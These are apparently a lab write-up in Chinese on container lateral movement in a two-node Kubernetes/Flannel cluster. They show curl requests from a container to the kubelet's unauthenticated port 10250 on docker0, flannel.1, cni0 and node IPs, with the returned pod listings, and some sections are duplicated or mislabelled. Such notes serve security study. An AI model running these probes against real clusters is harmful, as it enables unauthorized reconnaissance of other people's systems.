容器渗透横向

news2025/1/19 15:55:10

本质上要获得

1.获得容器IP段

2.获得主机IP段

3.获得本机IP

4.通过CNI或Docker0等扫描本机端口

Flannel

容器信息

root@ubuntu-linux-22-04-desktop:/home/parallels/Desktop# k get po -A -o wide
NAMESPACE      NAME                                                 READY   STATUS                   RESTARTS         AGE    IP            NODE                         NOMINATED NODE   READINESS GATES
default        escaper                                              1/1     Running                  0                24h    10.244.0.53   ubuntu-linux-22-04-desktop   <none>           <none>
default        rootdir-escape-7d96587449-cjhz7                      1/1     Running                  4 (3d2h ago)     33d    10.244.1.94   node2                        <none>           <none>
default        rootdir-escape-7d96587449-ftmhp                      0/1     ContainerStatusUnknown   4 (33d ago)      83d    10.244.1.56   node2                        <none>           <none>
default        tomcat01-7f555c84f7-hgzjh                            0/1     ImagePullBackOff         0                25h    10.244.0.49   ubuntu-linux-22-04-desktop   <none>           <none>
default        tomcat01-7fd8849567-gthhh                            0/1     ImagePullBackOff         1 (3d2h ago)     33d    10.244.1.93   node2                        <none>           <none>
kube-flannel   kube-flannel-ds-7jmkz                                1/1     Running                  10 (3d2h ago)    57d    10.211.55.7   node2                        <none>           <none>
kube-flannel   kube-flannel-ds-fg7wh                                1/1     Running                  89 (3d ago)      439d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    coredns-6d8c4cb4d-7ll4q                              1/1     Running                  14966 (3d ago)   439d   10.244.0.48   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    coredns-6d8c4cb4d-v2v6s                              1/1     Running                  14970 (3d ago)   439d   10.244.0.46   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    etcd-ubuntu-linux-22-04-desktop                      1/1     Running                  11 (3d ago)      118d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    kube-apiserver-ubuntu-linux-22-04-desktop            1/1     Running                  433 (3d ago)     400d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    kube-controller-manager-ubuntu-linux-22-04-desktop   1/1     Running                  855 (3d ago)     439d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    kube-proxy-wbhzx                                     1/1     Running                  84 (3d ago)      439d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
kube-system    kube-proxy-wbnkq                                     1/1     Running                  9 (3d2h ago)     57d    10.211.55.7   node2                        <none>           <none>
kube-system    kube-scheduler-ubuntu-linux-22-04-desktop            1/1     Running                  900 (3d ago)     439d   10.211.55.6   ubuntu-linux-22-04-desktop   <none>           <none>
sectest        detector-5qvmq                                       1/1     Running                  4 (3d ago)       21d    10.244.0.47   ubuntu-linux-22-04-desktop   <none>           <none>
sectest        detector-kd6hm                                       1/1     Running                  3 (3d2h ago)     21d    10.244.1.92   node2

网卡信息

node1

root@ubuntu-linux-22-04-desktop:/home/parallels/code/CloudPentestSuite# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:1c:42:23:16:2f brd ff:ff:ff:ff:ff:ff
    inet 10.211.55.6/24 metric 100 brd 10.211.55.255 scope global dynamic enp0s5
       valid_lft 1002sec preferred_lft 1002sec
    inet6 fdb2:2c26:f4e4:0:21c:42ff:fe23:162f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 2591674sec preferred_lft 604474sec
    inet6 fe80::21c:42ff:fe23:162f/64 scope link 
       valid_lft forever preferred_lft forever
3: docker_gwbridge: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:a9:12:87:bc brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global docker_gwbridge
       valid_lft forever preferred_lft forever
4: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:95:9f:9c:b1 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:95ff:fe9f:9cb1/64 scope link 
       valid_lft forever preferred_lft forever
5: flannel.1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UNKNOWN group default 
    link/ether 2e:52:7e:36:bb:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.244.0.0/32 scope global flannel.1
       valid_lft forever preferred_lft forever
    inet6 fe80::2c52:7eff:fe36:bbf6/64 scope link 
       valid_lft forever preferred_lft forever
6: cni0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP group default qlen 1000
    link/ether 5e:2b:ff:49:bf:21 brd ff:ff:ff:ff:ff:ff
    inet 10.244.0.1/24 brd 10.244.0.255 scope global cni0
       valid_lft forever preferred_lft forever
    inet6 fe80::5c2b:ffff:fe49:bf21/64 scope link 
       valid_lft forever preferred_lft forever
7: veth8c1b6acf@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 62:67:e7:13:1f:2e brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::6067:e7ff:fe13:1f2e/64 scope link 
       valid_lft forever preferred_lft forever
8: vethbaadb61c@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether ca:ee:34:ac:90:d1 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::c8ee:34ff:feac:90d1/64 scope link 
       valid_lft forever preferred_lft forever
8: veth49d153e6@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether f2:d0:0f:78:59:37 brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::f0d0:fff:fe78:5937/64 scope link 
       valid_lft forever preferred_lft forever
10: veth49b58a71@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 4a:7d:06:37:d8:7d brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::487d:6ff:fe37:d87d/64 scope link 
       valid_lft forever preferred_lft forever
11: vethd96bd702@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 6a:a7:34:e5:00:86 brd ff:ff:ff:ff:ff:ff link-netnsid 4
    inet6 fe80::68a7:34ff:fee5:86/64 scope link 
       valid_lft forever preferred_lft forever
12: veth7f1682e@if30: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether e6:a8:05:01:40:16 brd ff:ff:ff:ff:ff:ff link-netnsid 5
    inet6 fe80::e4a8:5ff:fe01:4016/64 scope link 
       valid_lft forever preferred_lft forever

node2

root@node2:/home/parallels# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:1c:42:ea:e4:e4 brd ff:ff:ff:ff:ff:ff
    inet 10.211.55.7/24 brd 10.211.55.255 scope global enp0s5
       valid_lft forever preferred_lft forever
    inet6 fdb2:2c26:f4e4:0:21c:42ff:feea:e4e4/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 2591800sec preferred_lft 604600sec
    inet6 fe80::21c:42ff:feea:e4e4/64 scope link 
       valid_lft forever preferred_lft forever
3: br-2133897d2ca9: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:fe:62:1e:ce brd ff:ff:ff:ff:ff:ff
4: br-53b41bbd8455: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:0d:36:42:b5 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::42:dff:fe36:42b5/64 scope link 
       valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:0a:01:3e:44 brd ff:ff:ff:ff:ff:ff
15: veth3a2c643@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether 4e:ae:51:95:b0:96 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::4cae:51ff:fe95:b096/64 scope link 
       valid_lft forever preferred_lft forever
17: vethcf86640@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether b6:a5:9e:65:ee:ec brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::b4a5:9eff:fe65:eeec/64 scope link 
       valid_lft forever preferred_lft forever
19: veth52d72dd@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether 82:b1:11:13:d4:0c brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::80b1:11ff:fe13:d40c/64 scope link 
       valid_lft forever preferred_lft forever
34: flannel.1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UNKNOWN group default 
    link/ether be:22:e7:6f:f7:ef brd ff:ff:ff:ff:ff:ff
    inet 10.244.1.0/32 scope global flannel.1
       valid_lft forever preferred_lft forever
    inet6 fe80::bc22:e7ff:fe6f:f7ef/64 scope link 
       valid_lft forever preferred_lft forever
35: cni0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP group default qlen 1000
    link/ether 92:63:7e:1c:2f:9d brd ff:ff:ff:ff:ff:ff
    inet 10.244.1.1/24 brd 10.244.1.255 scope global cni0
       valid_lft forever preferred_lft forever
    inet6 fe80::9063:7eff:fe1c:2f9d/64 scope link 
       valid_lft forever preferred_lft forever
36: vethd3d21947@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 92:43:ba:8b:b6:78 brd ff:ff:ff:ff:ff:ff link-netnsid 4
    inet6 fe80::9043:baff:fe8b:b678/64 scope link 
       valid_lft forever preferred_lft forever
37: veth31c95721@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether b6:ee:ea:c9:59:3a brd ff:ff:ff:ff:ff:ff link-netnsid 5
    inet6 fe80::b4ee:eaff:fec9:593a/64 scope link 
       valid_lft forever preferred_lft forever
38: veth1b480f08@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 7a:02:0b:ac:22:59 brd ff:ff:ff:ff:ff:ff link-netnsid 6
    inet6 fe80::6410:d3ff:fea2:2626/64 scope link 
       valid_lft forever preferred_lft forever
25913: veth4ca56da@if25912: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether 0a:24:ac:9b:8b:07 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::824:acff:fe9b:8b07/64 scope link 
       valid_lft forever preferred_lft forever
root@node2:/home/parallels# 
root@node2:/home/parallels# 
root@node2:/home/parallels# 
root@node2:/home/parallels# 
root@node2:/home/parallels# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:1c:42:ea:e4:e4 brd ff:ff:ff:ff:ff:ff
    inet 10.211.55.7/24 brd 10.211.55.255 scope global enp0s5
       valid_lft forever preferred_lft forever
    inet6 fdb2:2c26:f4e4:0:21c:42ff:feea:e4e4/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 2591796sec preferred_lft 604596sec
    inet6 fe80::21c:42ff:feea:e4e4/64 scope link 
       valid_lft forever preferred_lft forever
3: br-2133897d2ca9: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:fe:62:1e:ce brd ff:ff:ff:ff:ff:ff
4: br-53b41bbd8455: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:0d:36:42:b5 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::42:dff:fe36:42b5/64 scope link 
       valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:0a:01:3e:44 brd ff:ff:ff:ff:ff:ff
15: veth3a2c643@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether 4e:ae:51:95:b0:96 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::4cae:51ff:fe95:b096/64 scope link 
       valid_lft forever preferred_lft forever
17: vethcf86640@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether b6:a5:9e:65:ee:ec brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::b4a5:9eff:fe65:eeec/64 scope link 
       valid_lft forever preferred_lft forever
19: veth52d72dd@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether 82:b1:11:13:d4:0c brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::80b1:11ff:fe13:d40c/64 scope link 
       valid_lft forever preferred_lft forever
34: flannel.1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UNKNOWN group default 
    link/ether be:22:e7:6f:f7:ef brd ff:ff:ff:ff:ff:ff
    inet 10.244.1.0/32 scope global flannel.1
       valid_lft forever preferred_lft forever
    inet6 fe80::bc22:e7ff:fe6f:f7ef/64 scope link 
       valid_lft forever preferred_lft forever
35: cni0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP group default qlen 1000
    link/ether 92:63:7e:1c:2f:9d brd ff:ff:ff:ff:ff:ff
    inet 10.244.1.1/24 brd 10.244.1.255 scope global cni0
       valid_lft forever preferred_lft forever
    inet6 fe80::9063:7eff:fe1c:2f9d/64 scope link 
       valid_lft forever preferred_lft forever
36: vethd3d21947@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 92:43:ba:8b:b6:78 brd ff:ff:ff:ff:ff:ff link-netnsid 4
    inet6 fe80::9043:baff:fe8b:b678/64 scope link 
       valid_lft forever preferred_lft forever
37: veth31c95721@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether b6:ee:ea:c9:59:3a brd ff:ff:ff:ff:ff:ff link-netnsid 5
    inet6 fe80::b4ee:eaff:fec9:593a/64 scope link 
       valid_lft forever preferred_lft forever
38: veth1b480f08@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue master cni0 state UP group default 
    link/ether 7a:02:0b:ac:22:59 brd ff:ff:ff:ff:ff:ff link-netnsid 6
    inet6 fe80::6410:d3ff:fea2:2626/64 scope link 
       valid_lft forever preferred_lft forever
25963: veth6a3543e@if25962: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-53b41bbd8455 state UP group default 
    link/ether a2:ca:b6:cd:19:7a brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::a0ca:b6ff:fecd:197a/64 scope link 
       valid_lft forever preferred_lft forever

通过Docker运行容器

root@18c7d48fca76:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
30: eth0@if31: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

自身IP 失败

root@18c7d48fca76:/# curl https://172.17.0.2:10250/pods --insecure
curl: (7) Failed to connect to 172.17.0.2 port 10250 after 0 ms: Connection refused

docker0 成功

root@18c7d48fca76:/# curl https://172.17.0.1:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-7ll4q","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"a12aa7c3-ba0a-425e-ac58-96d372e6d473","resourceVersion":"13905304","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886401680+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3\"}":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"coredns\"}":{".":{},"f:args":{},"f:image":{},"f:imagePullPolicy":{},"f:livenessProbe":{".":{},"f:failureThreshold":{},"f:httpGet":{".":{},"f:path":{},"f:port":{},"f:scheme":{}},"f:initialDelaySeconds":{},"f:periodSeconds":{},"f:successThreshold":{},"f:timeoutSeconds":{}},"f:name":{},"f:ports":{".":{},"k:{\"containerPort\":53,\"protocol\":\"TCP\"}":{".":{},"f:containerPort":{},"f:name":{},"f:protocol":{}},"k:{\"contai

flannel.1 成功 

root@18c7d48fca76:/# curl https://10.244.0.0:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-v2v6s","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"7fbaad56-7595-460a-9687-a295ed79b24c","resourceVersion":"13905287","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404222+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\

cni0 成功

root@18c7d48fca76:/# curl https://10.244.0.0:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-v2v6s","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"7fbaad56-7595-460a-9687-a295ed79b24c","resourceVersion":"13905287","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404222+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\

自身节点主机IP 成功
root@18c7d48fca76:/# curl https://10.211.55.6:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kube-flannel-ds-fg7wh","generateName":"kube-flannel-ds-","namespace":"kube-flannel","uid":"cffe6a8a-c03b-4cab-aaf5-52af441f2b15","resourceVersion":"13864130","creationTimestamp":"2023-11-02T09:45:27Z","labels":{"app":"flannel","controller-revision-hash":"6b69bb98dd","pod-template-generation":"1","tier":"node"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404972+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"DaemonSet","name":"kube-flannel-ds","uid":"8beb07f0-980c-48a5-bdfa-ae1b5ca4bbca","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:45:27Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:app":{},"f:controller-revision-hash":{},"f:pod-template-generation":{},"f:tier":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"8beb07f0-980c-48a5-bdfa-ae1b5ca4bbca\"}":{}}},"f:spec":{"f:affinity":{".":{},"f:nodeAffinity":{".":{},"f:requiredDuringSchedulingIgnoredDuringExecution":{}}},"f:containers":{"k:{\"name\":\"kube-flannel\"}":{".":{},"f:args":{},
其他节点 成功(由于未开Kubelet未授权,所以用ping替代)
root@18c7d48fca76:/# ping 10.211.55.7
PING 10.211.55.7 (10.211.55.7): 56 data bytes
64 bytes from 10.211.55.7: icmp_seq=0 ttl=63 time=2.653 ms
64 bytes from 10.211.55.7: icmp_seq=1 ttl=63 time=0.610 ms
^C--- 10.211.55.7 ping statistics ---

通过k8s容器运行的容器

root@escaper:/home# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0@if27: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP group default 
    link/ether 46:a7:ed:f5:62:a7 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.244.0.53/24 brd 10.244.0.255 scope global eth0
       valid_lft forever preferred_lft forever

自身IP 失败

root@escaper:/home#  curl https://10.244.0.53:10250/pods --insecure
curl: (7) Failed to connect to 10.244.0.53 port 10250 after 0 ms: Connection refused

 docker0 成功

root@18c7d48fca76:/# curl https://172.17.0.1:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-7ll4q","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"a12aa7c3-ba0a-425e-ac58-96d372e6d473","resourceVersion":"13905304","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886401680+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3\"}":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"coredns\"}":{".":{},"f:args":{},"f:image":{},"f:imagePullPolicy":{},"f:livenessProbe":{".":{},"f:failureThreshold":{},"f:httpGet":{".":{},"f:path":{},"f:port":{},"f:scheme":{}},"f:initialDelaySeconds":{},"f:periodSeconds":{},"f:successThreshold":{},"f:timeoutSeconds":{}},"f:name":{},"f:ports":{".":{},"k:{\"containerPort\":53,\"protocol\":\"TCP\"}":{".":{},"f:containerPort":{},"f:name":{},"f:protocol":{}},"k:{\"contai

 flannel.1 成功 

root@18c7d48fca76:/# curl https://10.244.0.0:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-v2v6s","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"7fbaad56-7595-460a-9687-a295ed79b24c","resourceVersion":"13905287","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404222+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\
cni0 成功 
root@18c7d48fca76:/# curl https://10.244.0.0:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"coredns-6d8c4cb4d-v2v6s","generateName":"coredns-6d8c4cb4d-","namespace":"kube-system","uid":"7fbaad56-7595-460a-9687-a295ed79b24c","resourceVersion":"13905287","creationTimestamp":"2023-11-02T09:41:34Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"6d8c4cb4d"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404222+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-6d8c4cb4d","uid":"32c3b707-2c34-4bd0-bbc9-cc724c9ab8e3","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:41:34Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\
自身节点IP 
root@18c7d48fca76:/# curl https://10.211.55.6:10250/pods --insecure
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kube-flannel-ds-fg7wh","generateName":"kube-flannel-ds-","namespace":"kube-flannel","uid":"cffe6a8a-c03b-4cab-aaf5-52af441f2b15","resourceVersion":"13864130","creationTimestamp":"2023-11-02T09:45:27Z","labels":{"app":"flannel","controller-revision-hash":"6b69bb98dd","pod-template-generation":"1","tier":"node"},"annotations":{"kubernetes.io/config.seen":"2025-01-12T12:24:55.886404972+08:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"DaemonSet","name":"kube-flannel-ds","uid":"8beb07f0-980c-48a5-bdfa-ae1b5ca4bbca","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2023-11-02T09:45:27Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:app":{},"f:controller-revision-hash":{},"f:pod-template-generation":{},"f:tier":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"8beb07f0-980c-48a5-bdfa-ae1b5ca4bbca\"}":{}}},"f:spec":{"f:affinity":{".":{},"f:nodeAffinity":{".":{},"f:requiredDuringSchedulingIgnoredDuringExecution":{}}},"f:containers":{"k:{\"name\":\"kube-flannel\"}":{".":{},"f:args":{},

参考

Lateral movement risks in the cloud and how to prevent them – Part 2: from compromised container to cloud takeover | Wiz Blog

An Insight into RSAC 2023: Lateral Movement in Kubernetes - NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.

